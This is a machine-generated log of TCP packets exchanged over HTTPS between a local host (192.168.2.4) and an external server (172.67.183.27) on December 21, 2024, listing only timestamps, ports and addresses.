                                                                                                                                            Dec 21, 2024 20:13:55.409313917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.409358025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.409389973 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.409396887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.409440041 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.409480095 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.415816069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.415868998 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.415905952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.415913105 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.415935040 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.416024923 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.551966906 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.552027941 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.552166939 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.552166939 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.552176952 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.552253008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.557560921 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.557614088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.557653904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.557660103 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.557689905 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.557729006 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.563996077 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.564049006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.564089060 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.564095020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.564120054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.564165115 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.569967031 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.570009947 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.570044994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.570051908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.570077896 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.570138931 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.593770027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.593837976 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.593975067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.593975067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.593983889 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.594052076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.599652052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.599704981 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.599745035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.599751949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.599776983 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.599836111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.606173038 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.606216908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.606256008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.606267929 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.606295109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.606343031 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.611958981 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.612003088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.612036943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.612044096 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.612068892 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.612128019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.743788958 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.743850946 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.743901014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.743915081 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.743946075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.746437073 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.749536991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.749591112 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.749639034 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.749646902 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.749674082 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.749866962 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.756129980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.756184101 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.756222010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.756227970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.756254911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.756311893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.762594938 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.762639999 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.762677908 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.762684107 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.762710094 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.767654896 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.785924911 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.785990000 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.786030054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.786035061 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.786051035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.791397095 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.791960955 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.792031050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.792067051 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.792073965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.792098999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.794604063 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.799124002 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.799170017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.799226999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.799237013 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.799263000 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.799328089 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.804245949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.804290056 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.804327965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.804333925 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.804346085 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.804440975 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.936124086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.936192989 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.936223030 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.936229944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.936259985 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.936322927 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.942008018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.942054987 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.942076921 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.942084074 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.942111015 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.942127943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.948488951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.948533058 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.948549986 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.948556900 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.948602915 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.955111027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.955156088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.955193996 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.955199957 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.955229998 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.955249071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.978087902 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.978152990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.978163958 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.978185892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.978209019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.978235006 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.983947992 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.984009027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.984026909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.984033108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.984123945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.990586042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.990648985 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.990658998 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.990679026 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.990708113 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.990748882 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.996953964 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.997009039 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.997028112 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.997035980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:55.997075081 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:55.997093916 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.129005909 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.129070044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.129089117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.129105091 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.129138947 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.129167080 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.134265900 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.134308100 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.134355068 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.134363890 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.134401083 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.134401083 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.140671015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.140713930 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.140758038 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.140767097 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.140791893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.140805006 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.147337914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.147381067 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.147399902 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.147411108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.147439957 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.147454023 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.170701981 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.170743942 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.170770884 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.170783997 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.170811892 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.170825958 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.176563025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.176609993 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.176635981 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.176641941 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.176671028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.176688910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.183000088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.183041096 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.183072090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.183078051 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.183106899 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.183120012 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.189599991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.189642906 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.189673901 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.189682007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.189711094 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.189722061 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.321034908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.321096897 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.321115017 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.321124077 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.321160078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.321176052 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.326781034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.326848030 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.326858997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.326878071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.326908112 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.326925039 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.333270073 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.333317995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.333348989 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.333354950 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.333380938 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.333398104 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.339701891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.339747906 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.339771032 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.339776993 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.339807987 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.339835882 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.363491058 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.363559961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.363576889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.363584995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.363631010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.368940115 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.368988991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.369014978 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.369019985 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.369066000 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.375411034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.375464916 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.375502110 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.375508070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.375535011 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.375544071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.381851912 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.381906033 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.381928921 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.381934881 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.381970882 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.381983042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.513324022 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.513386965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.513417959 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.513437986 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.513463020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.513480902 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.518953085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.519023895 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.519051075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.519057035 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.519093990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.525867939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.525917053 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.525933027 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.525940895 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.525966883 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.526001930 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.531954050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.532004118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.532018900 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.532026052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.532062054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.555537939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.555598974 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.555619955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.555628061 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.555654049 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.555679083 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.561108112 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.561170101 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.561176062 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.561199903 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.561223030 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.561244011 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.567621946 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.567667961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.567689896 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.567696095 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.567724943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.567744017 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.574095964 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.574137926 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.574165106 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.574174881 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.574198961 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.574213028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.969146967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.969212055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.969242096 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.969252110 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.969295025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.974693060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.974752903 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.974772930 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.974780083 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.974809885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.974824905 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.981209993 CET44349737172.67.183.27192.168.2.4
